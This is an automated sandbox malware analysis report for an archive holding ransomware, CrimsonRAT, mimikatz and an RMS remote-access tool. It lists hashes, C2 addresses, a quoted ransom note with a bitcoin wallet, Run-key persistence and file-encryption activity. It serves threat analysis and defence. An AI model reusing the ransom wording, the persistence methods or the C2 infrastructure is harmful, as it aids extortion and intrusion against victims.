crimsonrat | 7d0b46f42ee73f4fe0084d3a6abe734fed72972162c1ae1ff391b8ac498f9440

Analysis

max time kernel
61s
max time network
83s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
12-11-2024 18:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00323.7z
Size

7.5MB
MD5

33ba43580498e09684c08d92bd7f6639
SHA1

aa89e6b43737f58eea83e1ef98c366883b3420dc
SHA256

7d0b46f42ee73f4fe0084d3a6abe734fed72972162c1ae1ff391b8ac498f9440
SHA512

d6a81b59df43573730ca45d93f20e03ad3ca4dcab25fc1a22b1f352c61b6eb9efad83e00e406bcf80b7b3c3a43be80cbb3d4d98ee2d3ea49faf61dc3e12dcd32
SSDEEP

196608:Uq3khxO0zyYw1KDiUGHgMuOII1Ez++taojRDVoNX:+xGXIwgMz1utaoJV+X

Score

10^/10

crimsonrat mimikatz rms discovery persistence ransomware rat trojan upx

Malware Config

Extracted

Family

crimsonrat

185.125.206.237

233.125.211.121

Extracted

Path

C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\HOW TO DECRYPT FILES.txt

Ransom Note

YOUR SYSTEM IS LOCKED AND ALL YOUR IMPORTANT DATA HAS BEEN ENCRYPTED. DON'T WORRY YOUR FILES ARE SAFE. TO RETURN ALL TO NORMALLY YOU MUST BUY THE CERBER DECRYPTOR PROGRAM. PAYMENTS ARE ACCEPTED ONLY THROUGH THE BITCOIN NETWORK. YOU CAN GET THEM VIA ATM MACHINE OR ONLINE https://coinatmradar.com/ (find a ATM) https://www.localbitcoins.com/ (buy instantly online any country) THE PRICE FOR DECRYPTOR SOFTWARE IS 0.8 BTC BTC ADRESS : 3KxEZKjS4ifAHhX2o1fq9tERkAshSgA4hg (where you need to make the payment) VERRY IMPORTANT ! DO NOT TRY TO SCAN WITH ANTIVIRUS YOU RISK LOSING YOUR DATA . ANTIVIRUSES ONLY DESTROY THE ENCRYPTED DATA , THEY DO NOT KNOW THE ALGORITH WITH WICH THE ENTIRE SYSTEM WAS ENCRYPTED. THE ONLY WAY TO DECRYPT YOUR SYSTEM AND RETURN TO NORMAL IS TO BUY THE ORIGINAL DECRYPTOR SOFTWARE. For more information : [email protected] (24/7) Subject : SYSTEM-LOCKED-ID: 10191895

Emails

[email protected]

Wallets

3KxEZKjS4ifAHhX2o1fq9tERkAshSgA4hg

URLs

https://coinatmradar.com/

https://www.localbitcoins.com/

Signatures

CrimsonRAT main payload 1 IoCs

resource	yara_rule
behavioral1/files/0x0008000000016d0c-17.dat	family_crimsonrat

CrimsonRat
Crimson RAT is a malware linked to a Pakistani-linked threat actor.
rat crimsonrat
Crimsonrat family
crimsonrat
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz
Mimikatz family
mimikatz
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
Rms family
rms
Renames multiple (329) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

mimikatz is an open source tool to dump credentials on Windows 2 IoCs

resource	yara_rule
behavioral1/memory/1032-38-0x0000000000400000-0x0000000000A86000-memory.dmp	mimikatz
behavioral1/files/0x0005000000019bf9-139.dat	mimikatz

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\International\Geo\Nation	rutserv.exe

Executes dropped EXE 13 IoCs

pid	Process
2428	HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe
2176	Trojan-Ransom.MSIL.Tear.bf-f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b.exe
1620	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
1524	Trojan-Ransom.Win32.Foreign.oaen-f5220b3421496f87202228e51fea3ef57c9acb25ed764b124bdc0676f8a15200.exe
1032	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
3060	Trojan-Ransom.Win32.Foreign.okah-9ff97c6be8bf57509583280c1519dc0ae6a1841ae3685d1321828bb1e76abdf4.exe
1008	mmkt.exe
1716	Creator.exe
1928	Satan.exe
2164	offdll32.exe
1652	rutserv.exe
2828	rutserv.exe

Loads dropped DLL 8 IoCs

pid	Process
1032	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
2720	taskmgr.exe
2720	taskmgr.exe
2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
1716	Creator.exe
1716	Creator.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Alcmeter = "C:\\Users\\Admin\\AppData\\Local\\Temp\\02130ye0T5GMhu3.exe"	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleSecurityUpdate = "C:\\ProgramData\\User\\Data\\RutservUpdate.exe /a"	Creator.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\desktop.ini	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3692679935-4019334568-335155002-1000\desktop.ini	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3692679935-4019334568-335155002-1000\desktop.ini	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	iplogger.com
5	iplogger.com

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1524-36-0x000000003F910000-0x000000003FA27000-memory.dmp	upx
behavioral1/files/0x0009000000018b05-29.dat	upx
behavioral1/memory/1524-933-0x000000003F910000-0x000000003FA27000-memory.dmp	upx

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Common Files\System\Ole DB\es-ES\sqlxmlx.rll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\InkObj.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwruklm.dat	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main\base_kor.xml	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\resources.pak	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\WidevineCdm\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\ktab.exe	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\7-Zip\Lang\gu.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\IpsPlugin.dll	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\DVD Maker\ja-JP\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Circle_VideoInset.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Scene_PAL.wmv	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ku-ckb.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\TipRes.dll	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Soft Blue.htm	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\System\ado\es-ES\msader15.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainBackground.wmv	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\cloud_Thumbnail.bmp	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\fi.pak	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwresslm.dat	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Internet Explorer\images\bing.ico	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_btn-previous-static.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\System\wab32res.dll	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\fr-FR\sqloledb.rll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\it-IT\WMM2CLIP.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\16_9-frame-highlight.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ka.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\fr-FR\msdaprsr.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\fr-FR\WMM2CLIP.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\7-Zip\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\main.xml	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\sk-SK\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\Bear_Formatted_MATTE2_PAL.wmv	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\chapters-static.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\NavigationUp_ButtonGraphic.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\uk.pak	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hwresplm.dat	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\Common Files\Microsoft Shared\MSInfo\fr-FR\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Sand_Paper.jpg	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\System\Ole DB\de-DE\oledb32r.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\bear_formatted_rgb6.wmv	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_frame-shadow.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_100_percent.pak	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\bin\pack200.exe	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\MSInfo\it-IT\msinfo32.exe.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Eurosti.TTF	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationUp_ButtonGraphic.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\NetworkServerControl.bat	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipRes.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\Common Files\Microsoft Shared\ink\th-TH\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File created	C:\Program Files\Common Files\System\Ole DB\de-DE\HOW TO DECRYPT FILES.txt	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_SelectionSubpicture.png	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Internet Explorer\en-US\networkinspection.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\TipRes.dll.mui	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 16 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Creator.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	offdll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.oaen-f5220b3421496f87202228e51fea3ef57c9acb25ed764b124bdc0676f8a15200.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.okah-9ff97c6be8bf57509583280c1519dc0ae6a1841ae3685d1321828bb1e76abdf4.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.MSIL.Tear.bf-f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xcopy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Satan.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Modifies registry class 10 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\....PAY_IN_MAXIM_24_HOURS_OR_ALL_YOUR_FILES_WILL_BE_PERMANENTLY_DELETED_PLEASE_BE_REZONABLE_you_have_only_1_single_chance_YOU_NEED_TO_PURCHASE_THE_DECRYPTOR_FROM_US_FAST_AND_URGENT\ = "GZEIZJTHTUXIBXE"	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE\ = "CRYPTED!"	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE\shell\open\command	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE\shell	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE\shell\open	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\02130ye0T5GMhu3.exe"	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\....PAY_IN_MAXIM_24_HOURS_OR_ALL_YOUR_FILES_WILL_BE_PERMANENTLY_DELETED_PLEASE_BE_REZONABLE_you_have_only_1_single_chance_YOU_NEED_TO_PURCHASE_THE_DECRYPTOR_FROM_US_FAST_AND_URGENT	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE\DefaultIcon	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\02130ye0T5GMhu3.exe,0"	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\GZEIZJTHTUXIBXE	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 7 IoCs

pid	Process
2428	HEUR-Trojan-Ransom.Win32.Agent.gen-2e0108dcb1859c775bce8a198a3a88c16c21fbc4b8740d1ff9dca55d444bd698.exe
2176	Trojan-Ransom.MSIL.Tear.bf-f4234a501edcd30d3bc15c983692c9450383b73bdd310059405c5e3a43cc730b.exe
1620	Trojan-Ransom.Win32.Agent.abxn-4b190a407bca89dd4778afa551bdc58dddff26fc5fe7622453e836ecdfaf565f.exe
2396	Trojan-Ransom.Win32.Blocker.lbni-89b10e9496774e6db334c1843de5cf520cc48ff2256b861b7036e26517d46574.exe
1032	Trojan-Ransom.Win32.CryFile.aacq-1f3509cc11ffa1f7d839df93615cf1ba0819d75cafd5ef59110d9b01fb90addd.exe
1524	Trojan-Ransom.Win32.Foreign.oaen-f5220b3421496f87202228e51fea3ef57c9acb25ed764b124bdc0676f8a15200.exe
3060	Trojan-Ransom.Win32.Foreign.okah-9ff97c6be8bf57509583280c1519dc0ae6a1841ae3685d1321828bb1e76abdf4.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
2720	taskmgr.exe
1008	mmkt.exe
